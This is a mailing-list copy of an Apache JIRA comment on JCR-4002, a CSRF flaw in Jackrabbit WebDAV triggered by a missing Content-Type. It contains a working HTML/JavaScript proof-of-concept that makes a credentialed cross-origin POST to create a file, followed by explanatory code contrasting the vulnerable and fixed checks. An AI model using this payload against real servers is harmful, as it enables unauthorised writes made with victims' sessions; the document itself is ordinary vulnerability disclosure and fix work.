jackrabbit-dev mailing list archives

From "Julian Reschke (JIRA)" <j...@apache.org>
Subject [jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type
Date Wed, 31 Aug 2016 12:41:20 GMT

    [ https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15452125#comment-15452125 ]

Julian Reschke commented on JCR-4002:
-------------------------------------

Backed out the changes in [r1758597|http://svn.apache.org/r1758597].

> CSRF in Jackrabbit-Webdav using empty content-type
> --------------------------------------------------
>
>                 Key: JCR-4002
>                 URL: https://issues.apache.org/jira/browse/JCR-4002
>             Project: Jackrabbit Content Repository
>          Issue Type: Bug
>          Components: jackrabbit-webdav
>    Affects Versions: 2.13.1
>            Reporter: Dominique Jäggi
>            Assignee: Dominique Jäggi
>            Priority: Blocker
>              Labels: csrf, security, webdav
>             Fix For: 2.13.2
>
>         Attachments: JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request content type.
> This can be exploited to create a resource via CSRF like so:
> {code}
> <html>
>   <body>
>     <script>
>       function submitRequest()
>       {
>         var xhr = new XMLHttpRequest();
>         // Cross-origin POST with the victim's cookies attached.
>         xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
>         xhr.withCredentials = true;
>         var body = "This file has been uploaded via CSRF.=\r\n";
>         var aBody = new Uint8Array(body.length);
>         for (var i = 0; i < aBody.length; i++)
>           aBody[i] = body.charCodeAt(i); 
>         // A Blob with no type is sent without any Content-Type header,
>         // so the request is not preflighted and the content-type check
>         // (which only lists specific types) does not reject it.
>         xhr.send(new Blob([aBody]));
>       }
>     </script>
>     <form action="#">
>       <input type="button" value="Submit request" onclick="submitRequest();" />
>     </form>
>   </body>
> </html>
> {code}
> I will mitigate this particular issue by including a null content type in the list of
> rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
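An added example, not Jackrabbit's own code, of the server-side content-type gate the issue describes, shown in its "before" form (a missing Content-Type is not on the rejected list, so it passes) and its "after" form (a missing or empty Content-Type is rejected like a form submission). The rejected-type list is an assumption: it is the set of request content types a browser sends cross-origin without a CORS preflight. The safe-method list, the header handling and the sample requests are constructed for illustration; the first sample request mirrors what the PoC above actually puts on the wire.

```javascript
'use strict';

// Assumption: the content types a browser may send cross-origin without a
// CORS preflight (the CORS-safelisted request content types).  A
// state-changing request carrying one of these (or none at all) may have
// been forged by a page on another origin.
const FORM_CONTENT_TYPES = new Set([
  'text/plain',
  'multipart/form-data',
  'application/x-www-form-urlencoded',
]);

// Assumption: methods treated as read-only and therefore not gated.
const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS', 'PROPFIND']);

// Reduce a Content-Type header value to its media type: lower-cased, with
// parameters stripped ("Text/Plain; charset=utf-8" -> "text/plain").
// Returns null when the header is absent or empty.
function mediaType(contentType) {
  if (contentType === undefined || contentType === null) return null;
  const mt = String(contentType).split(';')[0].trim().toLowerCase();
  return mt === '' ? null : mt;
}

// "Before": reject only when the media type is on the list.  A request with
// no Content-Type header (what xhr.send(new Blob([...])) produces for a Blob
// with an empty type) yields mediaType() === null, which is not in the set,
// so it is allowed through.
function isAllowedVulnerable(method, headers) {
  if (SAFE_METHODS.has(method.toUpperCase())) return true;
  const mt = mediaType(headers['content-type']);
  return !FORM_CONTENT_TYPES.has(mt);
}

// "After": a missing or empty Content-Type is treated like a form type and
// rejected as well, which is the mitigation the issue describes.
function isAllowedHardened(method, headers) {
  if (SAFE_METHODS.has(method.toUpperCase())) return true;
  const mt = mediaType(headers['content-type']);
  return mt !== null && !FORM_CONTENT_TYPES.has(mt);
}

// Constructed sample requests (header names lower-cased, as Node's http
// module presents them).  The first one mirrors the PoC: a credentialed
// POST whose Blob body has no type, so no Content-Type header is sent.
const SAMPLE_REQUESTS = [
  { name: 'PoC: POST, no Content-Type', method: 'POST', headers: {} },
  { name: 'form POST', method: 'POST',
    headers: { 'content-type': 'application/x-www-form-urlencoded' } },
  { name: 'text/plain POST with charset', method: 'POST',
    headers: { 'content-type': 'text/plain; charset=UTF-8' } },
  { name: 'WebDAV PUT, binary body', method: 'PUT',
    headers: { 'content-type': 'application/octet-stream' } },
  { name: 'PROPFIND (read-only)', method: 'PROPFIND', headers: {} },
];

// Run every sample request through both gates.
function evaluateAll() {
  return SAMPLE_REQUESTS.map((r) => ({
    name: r.name,
    vulnerable: isAllowedVulnerable(r.method, r.headers),
    hardened: isAllowedHardened(r.method, r.headers),
  }));
}

for (const row of evaluateAll()) {
  console.log(`${row.name.padEnd(32)} vulnerable=${row.vulnerable} hardened=${row.hardened}`);
}
```

Only the first row differs between the two gates: the PoC request is allowed by the "before" gate and rejected by the "after" gate, while genuine form posts stay rejected and a PUT with application/octet-stream stays allowed in both (a browser would preflight that request cross-origin, so it cannot be forged silently). Normalising the header before the lookup matters too: without stripping parameters and lower-casing, "text/plain; charset=UTF-8" would slip past an exact-string comparison just as the missing header did.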
